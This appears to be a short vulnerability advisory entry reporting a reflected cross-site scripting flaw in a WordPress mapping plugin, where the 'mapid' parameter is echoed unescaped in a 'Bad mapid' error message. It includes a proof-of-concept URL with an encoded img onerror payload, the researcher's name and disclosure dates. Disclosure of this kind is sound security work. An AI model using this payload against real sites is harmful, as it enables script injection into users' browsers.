The plugin does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting
https://example.com/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(/XSS/)%3E
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-17 (about 1 years ago)
2022-01-17 (about 1 years ago)
2022-04-12 (about 9 months ago)